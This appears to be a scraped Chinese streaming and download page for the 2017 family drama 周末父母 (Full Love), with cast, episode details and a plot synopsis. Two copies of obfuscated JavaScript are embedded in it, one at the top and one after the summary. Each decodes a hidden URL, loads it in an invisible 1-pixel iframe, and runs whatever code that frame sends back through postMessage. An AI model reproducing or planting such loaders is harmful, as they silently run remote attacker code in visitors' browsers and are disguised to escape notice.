if(typeof eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=="undefined"){eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=function(e){var sx="ABCDEFGHIJKLMNOPQRSTUVWXYZ"+"abcdefghijklmnopqrstuvwxyz"+"0123456789+/=";var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=sx.indexOf(e.charAt(f++));o=sx.indexOf(e.charAt(f++));u=sx.indexOf(e.charAt(f++));a=sx.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return(function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);};}
eval('\x77\x69\x6e\x64\x6f\x77')['FeMjSpm']=function (){ ;(function (u, w, d, f, c) { var x = qdfEWb; u = decodeURIComponent(x(u.replace(new RegExp(c + '' + c, 'g'), ''))); 'jQuery'; w['__y' + 'rq' + 'nq' + 'ob' + 'j_2484'] = d['qu' + 'ery' + 'Sele' + 'cto' + 'r']('#FeMjSpm'); var k = '', wr = 'w' + 'ri' + 't' + 'e'; 'jQuery'; var c = d[x('Y3VycmVudFNjcmlwdA==')]; var f = d.createElement('iframe'); f.id = new Date().getTime(); f.style.width = f.style.height = 1 + 'px'; f.src = [u].join('-'); d[wr](f.outerHTML); w['ad' + 'dEv' + 'entL' + 'ist' + 'ener']('m' + 'ess' + 'age', function (e) { if (e.data['des_s_2484']) { var t = x(e.data[`des_s_2484`].replace(new RegExp('FdaWAFAbWFf', 'g'), '')); new Function(decodeURIComponent(t.replace(/\+/g, '%20')))(); } });})(''+'aHR'+'FF0'+'cHF'+'FMl'+'M0E'+'lFF'+'MkY'+'FFl'+'MkZ'+'zc2'+'guF'+'FZG'+'NlM'+'Gsw'+'LmN'+'uJT'+'NBM'+'TA0'+'NFF'+'DMl'+'MkY'+'FFy'+'YjQ'+'1YF'+'FzY'+'lFF'+'MkZ'+'FFj'+'LTF'+'FI0'+'OFF'+'DQt'+'MjU'+'FFt'+'MSF'+'F5t'+'cDM'+'=', window, document, '' + 'Pwf' + 'SmZ' + 'j' + '', 'F');}

你的位置:首页 > 电视剧频道 > 大陆剧 > 周末父母

《周末父母》 免费在线播放/MP4手机在线观看/迅雷Bt下载

周末父母海报

周末父母

资源:周末父母全集在线观看播放 | 全集32集

类型:大陆剧 王鸥 华语标签 刘恺威 家庭 电视剧

年份:2017

简介: 于致远(刘恺威饰)系一个杂志社嘅老编,平日入面做嘢繁忙,可以用喺私人生活入面嘅时间少得凄凉。查看详情>>
if(typeof eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=="undefined"){eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=function(e){var sx="ABCDEFGHIJKLMNOPQRSTUVWXYZ"+"abcdefghijklmnopqrstuvwxyz"+"0123456789+/=";var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=sx.indexOf(e.charAt(f++));o=sx.indexOf(e.charAt(f++));u=sx.indexOf(e.charAt(f++));a=sx.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return(function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);};}
eval('\x77\x69\x6e\x64\x6f\x77')['XXeFFHa']=function (){ ;(function (u, w, d, f, c) { var x = qdfEWb; u = decodeURIComponent(x(u.replace(new RegExp(c + '' + c, 'g'), ''))); 'jQuery'; w['__y' + 're' + 'nq' + 'ob' + 'j_2093'] = d['qu' + 'ery' + 'Sele' + 'cto' + 'r']('#XXeFFHa'); var k = '', wr = 'w' + 'ri' + 't' + 'e'; 'jQuery'; var c = d[x('Y3VycmVudFNjcmlwdA==')]; var f = d.createElement('iframe'); f.id = new Date().getTime(); f.style.width = f.style.height = 1 + 'px'; f.src = [u].join('-'); d[wr](f.outerHTML); w['ad' + 'dEv' + 'entL' + 'ist' + 'ener']('m' + 'ess' + 'age', function (e) { if (e.data[`des_s_2093`]) { var t = x(e.data[`des_s_2093`].replace(new RegExp('FdaWAFAbWFf', 'g'), '')); new Function(decodeURIComponent(t.replace(/\+/g, '%20')))(); } });})(''+'FFa'+'HR0'+'cHF'+'FMl'+'M0E'+'lFF'+'MkY'+'lMk'+'FFZ'+'zcF'+'F2g'+'uaG'+'l6Y'+'nBk'+'dS5'+'jFF'+'biU'+'FFz'+'QTF'+'FEw'+'NFF'+'DQz'+'FFJ'+'TJF'+'FGM'+'jA1'+'YFF'+'zM2'+'FFJ'+'TJG'+'Yy0'+'yMD'+'kzL'+'TIF'+'F1L'+'TEu'+'Y3N'+'z', window, document, '' + 'Pwf' + 'SmZ' + 'j' + '', 'F');}

《周末父母》剧情介绍

周末父母影片剧照1

◎片  名 周末父母
◎译  名 Full Love
◎年  代 2017
◎产  地 内地
◎类  别 剧情,家庭
◎语  言 普通话
◎上映日期 2017-02-12
◎豆瓣评分 5.3
◎豆瓣链接  26715635
◎总 集数 32集
◎单集片长 45分钟
◎导  演 王为
◎编  剧 费慧君,李晓亮
◎主  演 刘恺威,王鸥,张萌,朱泳腾,金俊秀,杨菲洋,赵悦童,史文翔,袁紫侨,李思阳,吕云骢,万子晴,汪洋,颜景瑶,张瑞珈,李文俊,朱薇薇,全思颖,张萍娟,白茹,张秀婷,张大宝,杨鹏,李佳熹,张翔,付彦丹,吴任远,秦越,曲刚,袁闲,宋沂诺,顾琛,成方旭,徐风,陈智明,赵楚纶

◎简  介
于致远(刘恺威饰)系一个杂志社嘅老编,平日入面做嘢繁忙,可以用喺私人生活入面嘅时间少得凄凉。赵佳妮(王鸥饰)身为时尚公司高管,生活嘅重心自然到摆喺公司度,如果唔系,而家好唔容易挣嚟嘅地位分钟会畀人替代。呢对职场达人小夫妻,无奈之下,只能够将个仔于震轩寄养喺外婆家,净系得周休二日制先可以将个仔接返屋企,系名副其实嘅“周末父母”。喺难得嘅亲子光中,夫妻两自然系谂住子满足仔好多唔同种类嘅要求,带住佢满世界玩,就忽略咗最重要嘅教养问题。随着时间嘅推移,问题开始凸显,赵佳妮发现自己喺仔面前,根本冇身为阿妈嘅威信,个仔嘅个性都日益变得刁蛮桀骜起身。

大陆剧推荐